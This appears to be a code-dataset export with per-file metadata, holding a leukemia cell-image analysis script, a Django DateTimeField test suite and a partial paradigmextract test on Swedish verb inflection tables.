| 0.75289
| 0.744378
| 0.737927
| 0
| 0.089292
| 0.322376
| 21,568
| 819
| 83
| 26.334554
| 0.674376
| 0
| 0
| 0.79805
| 0
| 0.047354
| 0.653329
| 0.101215
| 0
| 0
| 0
| 0
| 0.033426
| 1
| 0.032033
| false
| 0
| 0.004178
| 0
| 0.038997
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a1748e0c93dc535fcb2b4d34785199b4b7f650d7
| 7,149
|
py
|
Python
|
Code/sidebysidething.py
|
HamzaAit/Leukemia-Detection-Image-Processing
|
60060de9e9c77424981880c80eb7bf98c9a01be3
|
[
"MIT"
] | null | null | null |
Code/sidebysidething.py
|
HamzaAit/Leukemia-Detection-Image-Processing
|
60060de9e9c77424981880c80eb7bf98c9a01be3
|
[
"MIT"
] | null | null | null |
Code/sidebysidething.py
|
HamzaAit/Leukemia-Detection-Image-Processing
|
60060de9e9c77424981880c80eb7bf98c9a01be3
|
[
"MIT"
] | null | null | null |
from PIL import Image
from numpy import asarray
import numpy as np
import matplotlib.pyplot as plt
import cv2
import math
path = "../Dataset/Single Cell/Blast/Im005_1.tif"
im = cv2.imread(path)
im = Image.open(path)
print(path)
imarr = np.copy(asarray(im.split()[0]))
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
imarr = clahe.apply(imarr)
thresh = 130
n = len(imarr)
m = len(imarr[0])
for i in range (imarr.shape[0]):
for j in range (imarr.shape[1]):
if(imarr[i][j] > thresh):
imarr[i][j] = 255
else:
imarr[i][j] = 0
bimg = Image.fromarray(imarr)
bimg.show()
wl = 35
for i in range(n - wl):
for j in range(m - wl):
valid = True
for k in range (i, i + wl):
if (imarr[k][j] == 255):
valid = False
break
if (imarr[k][j + wl] == 255):
valid = False
break
if (valid == False):
continue
for k in range (j, j + wl):
if (imarr[i][k] == 255):
valid = False
break
if (imarr[i + wl][k] == 255):
valid = False
break
if (valid == False):
continue
for x in range(i, i + wl):
for y in range (j, j + wl):
imarr[x][y] = 0
for i in range(n):
for j in range(m):
if(imarr[i][j] == 0):
imarr[i][j] = 255
else:
imarr[i][j] = 0
imarr = cv2.morphologyEx(imarr, cv2.MORPH_CLOSE, (10,10), iterations=3)
wl = 40
for i in range(n - wl):
for j in range(m - wl):
valid = True
for k in range (i, i + wl):
if (imarr[k][j] == 0 and i < n - wl):
valid = False
break
if (imarr[k][j + wl] == 0 and i < n - wl):
valid = False
break
if (valid == False):
continue
for k in range (j, j + wl):
if (imarr[i][k] == 0 and j < n - wl):
valid = False
break
if (imarr[i + wl][k] == 0 and j < n - wl):
valid = False
break
if (j == 0 or j == n-1 or j + wl == m - 1):
valid = True
if (i == 0 or i == n-1 or i + wl >= n - 1):
valid = True
if (valid == False):
continue
for x in range(i, i + wl):
for y in range (j, j + wl):
imarr[x][y] = 255
# def baseCase(i, j, visited):
# return (i>=n or j >= m or i < 0 or j < 0 or (i,j) in visited)
# def areaCalc(imarr, i, j, visited):
# if(baseCase(i, j, visited) or imarr[i][j] == 0):
# return 0
# visited.append((i,j))
# return 1 + areaCalc(imarr, i-1, j, visited) + areaCalc(imarr, i+1, j, visited) + areaCalc(imarr, i, j-1, visited) + areaCalc(imarr, i, j+1, visited)
# visited = []
imarr = cv2.morphologyEx(imarr, cv2.MORPH_OPEN, (10,10), iterations=5)
cleanimg = Image.fromarray(imarr)
cleanimg.show()
# print(areaCalc(imarr, n//2, m//2, visited))
def getArea(contours):
maxArea = 0
idx = 0
for i in range(0, len(contours)):
area = cv2.contourArea(contours[i])
if area > maxArea:
maxArea = area
idx = i
maxPerimeter = len(np.array(contours[idx]))
return maxArea, maxPerimeter
# image_src = cv2.imread("input.png")
# imarr = cv2.cvtColor(imarr, cv2.COLOR_BGR2GRAY)
ret, res = cv2.threshold(imarr, 250,255,0)
contours = cv2.findContours(res, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0]
print(getArea(contours))
area, perimeter = getArea(contours)
circularity = 4 * math.pi * area / (perimeter * perimeter)
print("Blast Cell: ", area, perimeter, circularity)
path = "../Dataset/Single Cell/Healthy/Im157_0.tif"
im = cv2.imread(path)
im = Image.open(path)
print(path)
imarr = np.copy(asarray(im.split()[0]))
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
imarr = clahe.apply(imarr)
thresh = 130
n = len(imarr)
m = len(imarr[0])
for i in range (imarr.shape[0]):
for j in range (imarr.shape[1]):
if(imarr[i][j] > thresh):
imarr[i][j] = 255
else:
imarr[i][j] = 0
bimg = Image.fromarray(imarr)
bimg.show()
wl = 35
for i in range(n - wl):
for j in range(m - wl):
valid = True
for k in range (i, i + wl):
if (imarr[k][j] == 255):
valid = False
break
if (imarr[k][j + wl] == 255):
valid = False
break
if (valid == False):
continue
for k in range (j, j + wl):
if (imarr[i][k] == 255):
valid = False
break
if (imarr[i + wl][k] == 255):
valid = False
break
if (valid == False):
continue
for x in range(i, i + wl):
for y in range (j, j + wl):
imarr[x][y] = 0
for i in range(n):
for j in range(m):
if(imarr[i][j] == 0):
imarr[i][j] = 255
else:
imarr[i][j] = 0
imarr = cv2.morphologyEx(imarr, cv2.MORPH_CLOSE, (10,10), iterations=3)
wl = 40
for i in range(n - wl):
for j in range(m - wl):
valid = True
for k in range (i, i + wl):
if (imarr[k][j] == 0 and i < n - wl):
valid = False
break
if (imarr[k][j + wl] == 0 and i < n - wl):
valid = False
break
if (valid == False):
continue
for k in range (j, j + wl):
if (imarr[i][k] == 0 and j < n - wl):
valid = False
break
if (imarr[i + wl][k] == 0 and j < n - wl):
valid = False
break
if (j == 0 or j == n-1 or j + wl == m - 1):
valid = True
if (i == 0 or i == n-1 or i + wl >= n - 1):
valid = True
if (valid == False):
continue
for x in range(i, i + wl):
for y in range (j, j + wl):
imarr[x][y] = 255
# def baseCase(i, j, visited):
# return (i>=n or j >= m or i < 0 or j < 0 or (i,j) in visited)
# def areaCalc(imarr, i, j, visited):
# if(baseCase(i, j, visited) or imarr[i][j] == 0):
# return 0
# visited.append((i,j))
# return 1 + areaCalc(imarr, i-1, j, visited) + areaCalc(imarr, i+1, j, visited) + areaCalc(imarr, i, j-1, visited) + areaCalc(imarr, i, j+1, visited)
# visited = []
imarr = cv2.morphologyEx(imarr, cv2.MORPH_OPEN, (10,10), iterations=5)
cleanimg = Image.fromarray(imarr)
cleanimg.show()
# print(areaCalc(imarr, n//2, m//2, visited))
# image_src = cv2.imread("input.png")
# imarr = cv2.cvtColor(imarr, cv2.COLOR_BGR2GRAY)
ret, res = cv2.threshold(imarr, 250,255,0)
contours = cv2.findContours(res, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0]
print(getArea(contours))
area, perimeter = getArea(contours)
circularity = 4 * math.pi * area / (perimeter * perimeter)
print("Healthy Cell: ", area, perimeter, circularity)
| 24.316327
| 154
| 0.498391
| 1,034
| 7,149
| 3.430368
| 0.106383
| 0.065125
| 0.03947
| 0.076685
| 0.89033
| 0.886947
| 0.886947
| 0.886947
| 0.886947
| 0.886947
| 0
| 0.04362
| 0.355434
| 7,149
| 294
| 155
| 24.316327
| 0.726128
| 0.145615
| 0
| 0.895833
| 0
| 0
| 0.017746
| 0.007558
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005208
| false
| 0
| 0.03125
| 0
| 0.041667
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1cfd220534c292e1e46d89f294bc02078e07f1e
| 5,103
|
py
|
Python
|
tests/forms_tests/field_tests/test_datetimefield.py
|
imjvdn/scratch-game-1
|
5dffd79f17e0b66d3d2e57262749311aca28e850
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 19
|
2015-07-07T02:08:59.000Z
|
2021-11-08T11:05:40.000Z
|
tests/forms_tests/field_tests/test_datetimefield.py
|
imjvdn/scratch-game-1
|
5dffd79f17e0b66d3d2e57262749311aca28e850
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 57
|
2018-10-08T12:37:30.000Z
|
2018-10-08T17:39:26.000Z
|
tests/forms_tests/field_tests/test_datetimefield.py
|
imjvdn/scratch-game-1
|
5dffd79f17e0b66d3d2e57262749311aca28e850
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 145
|
2019-03-14T18:54:45.000Z
|
2022-03-04T20:25:31.000Z
|
import datetime
from django.forms import DateTimeField, ValidationError
from django.test import SimpleTestCase
class DateTimeFieldTest(SimpleTestCase):
def test_datetimefield_1(self):
f = DateTimeField()
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
)
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59, 200),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.0002'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('2006-10-25 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('2006-10-25'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/2006 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/2006 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/2006'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/06 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/06 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/06'))
with self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'"):
f.clean('hello')
with self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'"):
f.clean('2006-10-25 4:30 p.m.')
def test_datetimefield_2(self):
f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
)
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59, 200),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006 10 25 2:30 PM'))
with self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'"):
f.clean('2006-10-25 14:30:45')
def test_datetimefield_3(self):
f = DateTimeField(required=False)
self.assertIsNone(f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertIsNone(f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datetimefield_4(self):
f = DateTimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 2006-10-25 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 2006-10-25 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/2006 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(' 10/25/2006 14:30 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/06 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/06 '))
with self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'"):
f.clean(' ')
def test_datetimefield_5(self):
f = DateTimeField(input_formats=['%Y.%m.%d %H:%M:%S.%f'])
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006.10.25 14:30:45.0002'))
def test_datetimefield_changed(self):
format = '%Y %m %d %I:%M %p'
f = DateTimeField(input_formats=[format])
d = datetime.datetime(2006, 9, 17, 14, 30, 0)
self.assertFalse(f.has_changed(d, '2006 09 17 2:30 PM'))
| 58.655172
| 115
| 0.621987
| 769
| 5,103
| 4.106632
| 0.088427
| 0.08613
| 0.134262
| 0.271691
| 0.838822
| 0.826156
| 0.80494
| 0.80494
| 0.780241
| 0.780241
| 0
| 0.222304
| 0.202234
| 5,103
| 86
| 116
| 59.337209
| 0.553427
| 0.008034
| 0
| 0.473684
| 0
| 0
| 0.132833
| 0
| 0
| 0
| 0
| 0
| 0.552632
| 1
| 0.078947
| false
| 0
| 0.039474
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
62a3bf9b3927642ba45a835b9cdac9f6451b7f9a
| 49,127
|
py
|
Python
|
tests/unit_tests/learning/test_collapse_tables.py
|
spraakbanken/paradigmextract
|
12dfda604ff72b5a951a89bd515f893bf01f2860
|
[
"MIT"
] | 2
|
2018-03-01T15:48:16.000Z
|
2019-05-07T11:28:19.000Z
|
tests/unit_tests/learning/test_collapse_tables.py
|
spraakbanken/paradigmextract
|
12dfda604ff72b5a951a89bd515f893bf01f2860
|
[
"MIT"
] | 1
|
2017-11-30T07:40:41.000Z
|
2017-11-30T07:40:41.000Z
|
tests/unit_tests/learning/test_collapse_tables.py
|
spraakbanken/paradigmextract
|
12dfda604ff72b5a951a89bd515f893bf01f2860
|
[
"MIT"
] | 1
|
2018-03-05T07:45:22.000Z
|
2018-03-05T07:45:22.000Z
|
from paradigmextract.pextract import _collapse_tables
def test1():
filteredtables = []
idform = "stad"
idtag = ("msd", "sg indef nom")
table = ["stad", "städer", "stads"]
c = ("[st]a[d]", "[st]ä[d]er", "[st]a[d]s")
variable_table = ["1+a+2", "1+ä+2+er", "1+a+2+s"]
variablelist = ["st", "d"]
numvars = 2
infixcount = 3
tags = [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")]
filteredtables.append(
(
idform,
idtag,
[table, c, variable_table, variablelist, numvars, infixcount],
tags,
)
)
idform = "bad"
idtag = ("msd", "sg indef nom")
table = ["bad", "bäder", "bads"]
c = ("[b]a[d]", "[b]ä[d]er", "[b]a[d]s")
variable_table = ["1+a+2", "1+ä+2+er", "1+a+2+s"]
variablelist = ["b", "d"]
numvars = 2
infixcount = 3
tags = [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")]
filteredtables.append(
(
idform,
idtag,
[table, c, variable_table, variablelist, numvars, infixcount],
tags,
)
)
paradigmlist = _collapse_tables(filteredtables)
assert len(paradigmlist) == 1
var_insts = paradigmlist[0].var_insts
assert ("1", "b") in var_insts[0]
assert ("2", "d") in var_insts[0]
assert ("1", "st") in var_insts[1]
assert ("2", "d") in var_insts[1]
def test2():
filteredtables = []
idform = "bord"
idtag = ("msd", "sg indef nom")
table = ["bord", "bord", "bords"]
c = ("[bord]", "[bord]", "[bord]s")
variable_table = ["1", "1", "1+s"]
variablelist = ["bord"]
numvars = 1
infixcount = 0
tags = [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")]
filteredtables.append(
(
idform,
idtag,
[table, c, variable_table, variablelist, numvars, infixcount],
tags,
)
)
idform = "bad"
idtag = ("msd", "sg indef nom")
table = ["bad", "bäder", "bads"]
c = ("[b]a[d]", "[b]ä[d]er", "[b]a[d]s")
variable_table = ["1+a+2", "1+ä+2+er", "1+a+2+s"]
variablelist = ["b", "d"]
numvars = 2
infixcount = 3
tags = [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")]
filteredtables.append(
(
idform,
idtag,
[table, c, variable_table, variablelist, numvars, infixcount],
tags,
)
)
paradigmlist = _collapse_tables(filteredtables)
assert len(paradigmlist) == 2
var_insts = paradigmlist[0].var_insts
assert ("1", "bord") in var_insts[0]
var_insts = paradigmlist[1].var_insts
assert ("1", "b") in var_insts[0]
assert ("2", "d") in var_insts[0]
def test_transient():
filtered_tables = [
(
"sopar bort",
("msd", "pres ind aktiv"),
[
[
"sopar bort",
"sopas bort",
"sopade bort",
"sopades bort",
"sopa bort",
"sopa bort",
"sopas bort",
"sopat bort",
"sopats bort",
"sopande bort",
"sopandes bort",
"sopad bort",
"bortsopad",
"sopads bort",
"bortsopads",
"sopat bort",
"bortsopat",
"sopats bort",
"bortsopats",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
],
(
"[sopa]r bort",
"[sopa]s bort",
"[sopa]de bort",
"[sopa]des bort",
"[sopa] bort",
"[sopa] bort",
"[sopa]s bort",
"[sopa]t bort",
"[sopa]ts bort",
"[sopa]nde bort",
"[sopa]ndes bort",
"[sopa]d bort",
"bort[sopa]d",
"[sopa]ds bort",
"bort[sopa]ds",
"[sopa]t bort",
"bort[sopa]t",
"[sopa]ts bort",
"bort[sopa]ts",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["sopa"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"jagar bort",
("msd", "pres ind aktiv"),
[
[
"jagar bort",
"jagas bort",
"jagade bort",
"jagades bort",
"jaga bort",
"jaga bort",
"jagas bort",
"jagat bort",
"jagats bort",
"jagande bort",
"jagandes bort",
"jagad bort",
"bortjagad",
"jagads bort",
"bortjagads",
"jagat bort",
"bortjagat",
"jagats bort",
"bortjagats",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
],
(
"[jaga]r bort",
"[jaga]s bort",
"[jaga]de bort",
"[jaga]des bort",
"[jaga] bort",
"[jaga] bort",
"[jaga]s bort",
"[jaga]t bort",
"[jaga]ts bort",
"[jaga]nde bort",
"[jaga]ndes bort",
"[jaga]d bort",
"bort[jaga]d",
"[jaga]ds bort",
"bort[jaga]ds",
"[jaga]t bort",
"bort[jaga]t",
"[jaga]ts bort",
"bort[jaga]ts",
"[jaga]de bort",
"bort[jaga]de",
"[jaga]des bort",
"bort[jaga]des",
"[jaga]de bort",
"bort[jaga]de",
"[jaga]des bort",
"bort[jaga]des",
"[jaga]de bort",
"bort[jaga]de",
"[jaga]des bort",
"bort[jaga]des",
"[jaga]de bort",
"bort[jaga]de",
"[jaga]des bort",
"bort[jaga]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["jaga"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"kollrar bort",
("msd", "pres ind aktiv"),
[
[
"kollrar bort",
"kollras bort",
"kollrade bort",
"kollrades bort",
"kollra bort",
"kollra bort",
"kollras bort",
"kollrat bort",
"kollrats bort",
"kollrande bort",
"kollrandes bort",
"kollrad bort",
"bortkollrad",
"kollrads bort",
"bortkollrads",
"kollrat bort",
"bortkollrat",
"kollrats bort",
"bortkollrats",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
],
(
"[kollra]r bort",
"[kollra]s bort",
"[kollra]de bort",
"[kollra]des bort",
"[kollra] bort",
"[kollra] bort",
"[kollra]s bort",
"[kollra]t bort",
"[kollra]ts bort",
"[kollra]nde bort",
"[kollra]ndes bort",
"[kollra]d bort",
"bort[kollra]d",
"[kollra]ds bort",
"bort[kollra]ds",
"[kollra]t bort",
"bort[kollra]t",
"[kollra]ts bort",
"bort[kollra]ts",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["kollra"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"gallrar bort",
("msd", "pres ind aktiv"),
[
[
"gallrar bort",
"gallras bort",
"gallrade bort",
"gallrades bort",
"gallra bort",
"gallra bort",
"gallras bort",
"gallrat bort",
"gallrats bort",
"gallrande bort",
"gallrandes bort",
"gallrad bort",
"bortgallrad",
"gallrads bort",
"bortgallrads",
"gallrat bort",
"bortgallrat",
"gallrats bort",
"bortgallrats",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
],
(
"[gallra]r bort",
"[gallra]s bort",
"[gallra]de bort",
"[gallra]des bort",
"[gallra] bort",
"[gallra] bort",
"[gallra]s bort",
"[gallra]t bort",
"[gallra]ts bort",
"[gallra]nde bort",
"[gallra]ndes bort",
"[gallra]d bort",
"bort[gallra]d",
"[gallra]ds bort",
"bort[gallra]ds",
"[gallra]t bort",
"bort[gallra]t",
"[gallra]ts bort",
"bort[gallra]ts",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
